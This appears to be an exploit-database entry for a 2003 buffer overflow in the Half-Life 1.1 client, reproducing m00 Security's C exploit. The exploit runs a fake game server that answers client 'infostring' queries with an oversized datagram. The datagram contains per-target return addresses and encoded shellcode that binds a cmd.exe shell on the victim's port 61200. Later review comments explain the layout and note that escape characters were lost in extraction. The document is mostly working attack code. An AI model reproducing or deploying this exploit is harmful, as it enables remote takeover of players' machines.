Valve Software Half-Life 1.1 Client – Connection Routine Buffer Overflow (1)
漏洞ID | 1054067 | 漏洞类型 | |
发布时间 | 2003-07-29 | 更新时间 | 2003-07-29 |
CVE编号 | N/A |
CNNVD-ID | N/A |
漏洞平台 | Windows | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
// source: http://www.securityfocus.com/bid/8299/info
// Half-Life Client has been reported prone to a remotely exploitable buffer overflow condition.
// The issue presents itself in the client connection routine, used by the client to negotiate a connection to the Half-Life game server. Due to a lack of sufficient bounds checking performed on both the parameter and value of data transmitted from the game server to the client, a malicious server may execute arbitrary code on an affected client.
/*
* m00 Security presents
* HalfLife client <=v.1.1.1.0 remote exploit
*
* binds cmd.exe shell on port 61200
*
* Available targets:
* 1. win2k sp3 en
* 2. winxp nosp ru
* 3. winxp sp1 ru
* 4. win98 se2 (u need change shellcode)
*
* Bug discovered by
* Auriemma Luigi [www.pivx.com/luigi]
*
* Authors:
* d4rkgr3y [grey_1999_at_mail.ru]
* Over_G [overg_at_mail.ru]
*
* U can find us at:
* irc.wom.ru@m00
* irc.dal.net@m00security
*
* PS: m00security.org will be available soon ;)
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <arpa/inet.h>
#include <netdb.h>
#define PORT 27015 // UDP port the tool binds on; it poses as a game server and waits for client probes
/* Fixed 18-byte reply returned to a client "ping" probe (see main()).
 * NOTE(review): the escape sequences in this and the literals below appear to
 * have lost their backslashes in extraction ("xff" where "\xff" was meant), so
 * the literal text is longer than the declared size and the byte offsets used
 * in main() no longer line up with this text. Treat the listing as a record of
 * the technique, not as compilable source. */
char ping[0x12]=
"xffxffxffxffx6ax00x20x20x20"
"x20x20x20x20x20x20x20x20x20";
/* Oversized "infostringresponse" datagram sent to a client that queried
 * "infostring". Layout, following the author's own section comments: the
 * protocol header, a long run of filler (labelled 512 bytes), a 4-byte slot
 * labelled EIP that main() overwrites at offset 536 with a per-target address,
 * four 0x90 bytes, an encoded payload, and the datagram terminator.
 * This server-to-client reply is the message the advisory describes as
 * overflowing the client's connection routine; on the wire its distinguishing
 * feature is an infostringresponse from port 27015 that is presumably far
 * longer than any legitimate server reply. */
unsigned char evilbuf[] =
/* header of HalfLife udp-datagram | do not edit */
"xFFxFFxFFxFFx69x6Ex66x6Fx73x74x72x69"
"x6Ex67x72x65x73x70x6Fx6Ex73x65x00x5c"
/* 512 bytes for bof */
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAA"
"x5ax5ax5ax5a" // EIP (placeholder; replaced by main() when a target number is given)
"x90x90x90x90" // payload for esp
/* winxp/2k xored portbind shellcode */
/* If u want to use this xsploit against win9x/ME, change shellcode to another one */
"x8BxC4x83xC0x15x33xC9x66xB9xD1x01x80x30x96x40xE2xFA" // decrypt
"x15x7AxA2x1Dx62x7ExD1x97x96x96x1Fx90x69xA0xFEx18xD8x98x7Ax7ExF7"
"x97x96x96x1FxD0x9Ex69xA0xFEx3Bx4Fx93x58x7ExC4x97x96x96x1FxD0"
"x9AxFExFAxFAx96x96xFExA5xA4xB8xF2xFExE1xE5xA4xC9xC2x69xC0x9E"
"x1FxD0x92x69xA0xFExE4x68x25x80x7ExBBx97x96x96x1FxD0x86x69xA0"
"xFExE8x4Ex74xE5x7Ex88x97x96x96x1FxD0x82x69xE0x92xFEx5Dx7Bx6A"
"xADx7Ex98x97x96x96x1FxD0x8Ex69xE0x92xFEx4Fx9Fx63x3Bx7Ex68x96"
"x96x96x1FxD0x8Ax69xE0x92xFEx32x8CxE6x51x7Ex78x96x96x96x1FxD0"
"xB6x69xE0x92xFEx32x3BxB8x7Fx7Ex48x96x96x96x1FxD0xB2x69xE0x92"
"xFEx73xDFx10xDFx7Ex58x96x96x96x1FxD0xBEx69xE0x92xFEx71xEFx50"
"xEFx7Ex28x96x96x96x1FxD0xBAxA5x69x17x7Ax06x97x96x96xC2xFEx97"
"x97x96x96x69xC0x8ExC6xC6xC6xC6xD6xC6xD6xC6x69xC0x8Ax1Dx4ExC1"
"xC1xFEx94x96x79x86x1Dx5AxFCx80xC7xC5x69xC0xB6xC1xC5x69xC0xB2"
"xC1xC7xC5x69xC0xBEx1Dx46xFExF3xEExF3x96xFExF5xFBxF2xB8x1FxF0"
"xA6x15x7AxC2x1BxAAxB2xA5x56xA5x5Fx15x57x83x3Dx74x6Bx50xD2xB2"
"x86xD2x68xD2xB2xABx1FxC2xB2xDEx1FxC2xB2xDAx1FxC2xB2xC6x1BxD2"
"xB2x86xC2xC6xC7xC7xC7xFCx97xC7xC7x69xE0xA6xC7x69xC0x86x1Dx5A"
"xFCx69x69xA7x69xC0x9Ax1Dx5ExC1x69xC0xBAx69xC0x82xC3xC0xF2x37"
"xA6x96x96x96x13x56xEEx9Ax1DxD6x9Ax1DxE6x8Ax3Bx1DxFEx9Ex7Dx9F"
"x1DxD6xA2x1Dx3Ex2Ex96x96x96x1Dx53xC8xCBx54x92x96xC5xC3xC0xC1"
"x1DxFAxB2x8Ex1DxD3xAAx1DxC2x93xEEx95x43x1DxDCx8Ex1DxCCxB6x95"
"x4Bx75xA4xDFx1DxA2x1Dx95x63xA5x69x6AxA5x56x3AxACx52xE2x91x57"
"x59x9Bx95x6Ex7Dx64xADxEAxB2x82xE3x77x1DxCCxB2x95x4BxF0x1Dx9A"
"xDDx1DxCCx8Ax95x4Bx1Dx92x1Dx95x53x7Dx94xA5x56x1Dx43xC9xC8xCB"
"xCDx54x92x96"
/* end */
"x5Cx00"; // end of udp-HL-datagram. Do not change!
/* Per-target 4-byte addresses that main() copies into evilbuf's EIP slot based
 * on argv[1]. Each is specific to one OS build (the header lists four); the
 * author annotates only the XP entry as a jmp esp in ntdll.dll. Note that the
 * header comment calls target 1 "win2k sp3 en" while the usage text in main()
 * says "ru" — which build the first address really belongs to cannot be told
 * from this listing. */
char retw2ksp3[] = "xc5xafxe2x77";
char retwxpsp0[] = "x1cx80xf5x77"; // ntdll.dll :: jmp esp
char retwxpsp1[] = "xbax26xe6x77";
char retw98se2[] = "xa9xbfxdax7f";
/* Entry point: a fake Half-Life server. It binds UDP 27015, answers client
 * "ping" probes with a canned reply, and answers "infostring" queries with the
 * oversized evilbuf datagram. Takes exactly one argument, the target number
 * (1-4) that selects which address is patched into evilbuf.
 * NOTE(review): the bare "n"/"nr" inside the printf format strings look like
 * "\n"/"\n\r" with the backslashes lost in extraction, like the byte strings
 * above. The loop never returns normally; every exit is via exit(). */
int main(int argc, char **argv) {
int sock, sf, len, i;
u_short port=PORT;
struct sockaddr_in fukin_addr, rt; // fukin_addr: local bind address; rt: peer of the last datagram
char buf[0x1000]; // receive buffer; never NUL-terminated by this code (see strstr() notes below)
printf("nrHalfLife client v.1.1.1.0 remote exploit by m00 Securityn");
if(argc!=2) {
// NOTE(review): this usage string spans several source lines with no line
// continuation, so as extracted it is not a valid C string literal. The OS
// labels here (all "ru") also differ from the header comment ("win2k sp3 en").
printf("
 Usage: %s <remote_os>
 where os:
 1 - win2k sp3 ru
 2 - winxp nosp ru
 3 - winxp sp1 ru
 4 - win98 se2 ru (need another shellcode)
",argv[0]);
exit(0);
}
// Target selection: the chosen 4-byte address overwrites evilbuf[536..539],
// which the payload comments label as the EIP slot. atoi() of a non-numeric
// or out-of-range argument matches none of the four cases, so evilbuf is then
// sent with its placeholder bytes unchanged and no error is reported.
if(atoi(argv[1])==1) {
for(i=0;i<4;i++) {
evilbuf[536+i]=retw2ksp3[i];
}
}
if(atoi(argv[1])==2) {
for(i=0;i<4;i++) {
evilbuf[536+i]=retwxpsp0[i];
}
}
if(atoi(argv[1])==3) {
for(i=0;i<4;i++) {
evilbuf[536+i]=retwxpsp1[i];
}
}
if(atoi(argv[1])==4) {
for(i=0;i<4;i++) {
evilbuf[536+i]=retw98se2[i];
}
}
// Plain UDP socket; the tool never initiates traffic, it only replies to probes.
if((sock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP))<0) {
perror("[-] socket()");
exit(0);
}
printf("n[+] Socket created.n");
// Bind every local interface on 27015 (presumably the port Half-Life clients
// query), so any client that browses or adds this host as a server talks to it.
// fukin_addr is not zeroed first; sin_zero is left uninitialised (harmless here).
fukin_addr.sin_addr.s_addr = INADDR_ANY;
fukin_addr.sin_port = htons(port);
fukin_addr.sin_family = AF_INET;
if(bind(sock, (struct sockaddr *)&fukin_addr, sizeof(fukin_addr))<0) {
perror("[-] bind()");
exit(0);
}
printf("[+] Port %i binded.n", port);
sf = sizeof(rt); // passed as the address-length in/out argument; recvfrom() expects socklen_t*, not int*
// Serve forever: one datagram per iteration, classified by substring match.
while(1) {
if ((len = recvfrom(sock, buf, sizeof(buf), 0, (struct sockaddr *)&rt, &sf))<0) {
perror("[-] recv()");
exit(1);
}
printf("[+] Incoming udp datagram: ");
// Off-by-one: "<=" prints len+1 bytes, one past the received data.
for (i=0;i<=len;i++){
printf("%c",buf[i]);
}
printf("n[~] Identyfication... ");
// The datagram is matched with strstr() although buf was never NUL-terminated,
// so the search can run past the received bytes (and past buf itself when a
// full 0x1000-byte datagram arrives). The match is also a substring match, so
// any payload containing "ping" anywhere is treated as a ping probe.
if(strstr(buf,"ping")) {
printf("PING requestn[~] Sending answer... ");
// Canned 18-byte reply, presumably so the client proceeds to its next query.
if(sendto(sock, ping, sizeof(ping), 0, (struct sockaddr *)&rt, sizeof(rt))<0) {
perror("[-] send()");
exit(1);
} else {
printf("OKn");
}
continue;
}
if(strstr(buf,"infostring")) {
printf("INFOSTRING requestn[~] Attacking... OKn");
// The address printed is the *client's* (rt), because the payload described
// in the header binds a shell on the client, not on this host.
printf("[+] Now try to connect to: %s:61200n", inet_ntoa(rt.sin_addr));
// The oversized infostringresponse: this server-to-client reply is the
// message the advisory says overflows the client's connection routine.
if(sendto(sock, evilbuf, sizeof(evilbuf), 0, (struct sockaddr *)&rt, sizeof(rt))<0) {
perror("[-] send()");
exit(1);
}
continue;
}
printf("unknow requestn");
}
// Unreachable: the loop above only leaves via exit().
close(sock);
return 0;
}
// mOOOOOOOOOOOOOoooooooooooooooooooooo